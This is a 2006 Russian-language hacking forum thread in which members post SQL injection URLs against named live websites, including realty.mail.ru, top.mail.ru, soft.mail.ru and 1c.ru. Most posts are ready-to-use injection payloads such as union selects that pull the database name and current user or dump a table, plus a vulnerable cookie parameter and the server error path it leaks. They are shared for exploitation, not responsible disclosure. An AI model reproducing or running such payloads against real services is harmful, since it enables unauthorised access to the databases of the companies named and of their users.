Тема: Sql иньекция на Mail.ru!

Discussion in 'Уязвимости' started by xdx, 4 Jan 2006.

  1. xdx

    xdx Elder - Старейшина

    Joined:
    15 Sep 2005
    Messages:
    91
    Likes Received:
    24
    Reputations:
    3
    #1 xdx, 4 Jan 2006
    Last edited: 4 Jan 2006
    3 people like this.
  2. xdx

    xdx Elder - Старейшина

    Joined:
    15 Sep 2005
    Messages:
    91
    Likes Received:
    24
    Reputations:
    3
    или уш вот -) http://realty.mail.ru/main/sale/id_1'www.antichat.ru-FOREVA'/results.aspx
     
    #2 xdx, 4 Jan 2006
  3. xdx

    xdx Elder - Старейшина

    Joined:
    15 Sep 2005
    Messages:
    91
    Likes Received:
    24
    Reputations:
    3
    лень создавать тему и в топку -) http://www.1c.ru/partwebs/partwebs.jsp?city=www.antichat.ru'%20union%20select%20DB_NAME(1),CURRENT_USER--
     
    #3 xdx, 4 Jan 2006
  4. xdx

    xdx Elder - Старейшина

    Joined:
    15 Sep 2005
    Messages:
    91
    Likes Received:
    24
    Reputations:
    3
    Щас проверим :(
    РАБОТАЕТ не так ссылку написал :(
    http://www.1c.ru/partwebs/partwebs.jsp?city=antichat.ru'%20union%20select%20DB_NAME(0),CURRENT_USER--

    Вот работает
    http://realty.mail.ru/main/sale/id_1'/results.aspx

    после id_1 НАДО чтоб он написал ' а он не пишет
     
    #4 xdx, 4 Jan 2006
    Last edited: 4 Jan 2006
  5. Dagon

    Dagon Elder - Старейшина

    Joined:
    27 Mar 2006
    Messages:
    57
    Likes Received:
    24
    Reputations:
    8
    вот нашел еще одну sql иньекцию в mail.ru

    http://top.mail.ru/stat?url=www.orel.ru'%20UNION%20SELECT%20*%20FROM%20pages/*
     
    #5 Dagon, 5 Jun 2006
    1 person likes this.
  6. Go0o$E

    Go0o$E Members of Antichat

    Joined:
    27 Jan 2006
    Messages:
    304
    Likes Received:
    228
    Reputations:
    419
    SQL-INJECTION на soft.mail.ru.

    Уязвимость в cookies на страницах:
    Code:
    index.php, interview_list.php, search_result_header.php, softclub-main.php.
    Уязвимый параметр - OP_ID='.

    Ошибка:
    Code:
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/test.allsoft.ru/aux/bokovik/opinion.inc on line 84
     
    #6 Go0o$E, 1 Jul 2006
    2 people like this.
  7. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    А что линк убрал?
     
    #7 SanyaX, 1 Jul 2006
  8. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Я помню ещё с киборгом смотрели. Затряли на кодировке.
     
    #8 SanyaX, 1 Jul 2006
  9. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    статью мою почитай
     
    #9 ZaCo, 1 Jul 2006
  10. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    http://top.mail.ru/stat?url=999%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15/*
     
    #10 bul.666, 1 Jul 2006
    1 person likes this.
  11. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    Zaco дай пожалуста ссылку.
     
    #11 SanyaX, 1 Jul 2006
  12. ZaCo

    ZaCo Banned

    Joined:
    20 Jun 2005
    Messages:
    737
    Likes Received:
    336
    Reputations:
    215
    http://forum.antichat.ru/thread19684.html
     
    #12 ZaCo, 1 Jul 2006
  13. D3s

    D3s Elder - Старейшина

    Joined:
    1 Jul 2006
    Messages:
    45
    Likes Received:
    1
    Reputations:
    0
    Народ, обьясните пожалуйсто что с этим можно сделать?
     
    #13 D3s, 2 Jul 2006
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.